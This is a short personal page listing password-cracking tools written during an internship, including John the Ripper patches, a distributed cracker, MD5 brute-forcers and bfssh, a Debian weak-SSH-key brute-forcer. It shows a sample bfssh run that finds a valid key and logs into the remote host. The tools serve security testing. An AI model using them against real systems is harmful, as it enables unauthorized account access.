Password cracking tools

Some tools I (Romain Raboin) wrote during my intership at France Telecom R&D:

• myjohn Corrections on Simon Maréchal's patch for John The Ripper.

• passwd_cracker Distributed (in Ruby) password cracker using myjohn. This tool use a client-server architecture to distribute the hash calculation.

• HTTP Digest Access Authentication patch. A patch for john-1.7.3 that allow you to brute force HTTP Digest Access Authentication when you got a network capture of an authentication.

• MD5 cracker for CELL architecture MD5 brute forcer implementation for CELL architecture. (155 Mpwds/s) (coming soon !)

• MD5 cracker for CELL architecture MD5 brute forcer implementation for CELL architecture. (120 Mpwds/s) (PoC)

• bfssh: a multi-threaded tool written in C to test for weak keys in authorized_keys files on a remote machine. It will test for all possible keys for a given architecture in less than five minutes on a decent network. You'll need a vulnerable libssl/libcrypto and libssh to compile/use it.

Changes in myjohn

- Compilation fix for: - linux-x86-64 - macosx-x86-mmx - macosx-ppc32 - Password format fix for linux-x86-64: - mysqlsha1 - openldaps - pixMD5

passwd_cracker features

- Communication between client and server is secured using ssl. - Monitor the password cracking progress at this address: https://server_addr:port/admin - Force server to reload password file by sending SIGHUP to him. - You can specify a priority for password by adding 'priority:x ' at the begin of the password line (see README).

bfssh example :

$ ./bfssh -h ssllol -u toto -p22 -d6 -t rsa -s 2048 -a x86 == BFSSH a strong debian weak key bruteforcer == MaxAuthTries: 6 STATUS: thread: 5 test key: 05790 ... 05795 Authentication success: ./key-x86/rsa2048/id_rsa.05784.pub $ ssh -i ./key-x86/rsa2048/id_rsa.05784 toto@ssllol [snip] $ id uid=1000(toto) gid=1000(toto) groups=4(adm),109(admin),1000(toto)

Contact

romain.raboin _at_ gmail.com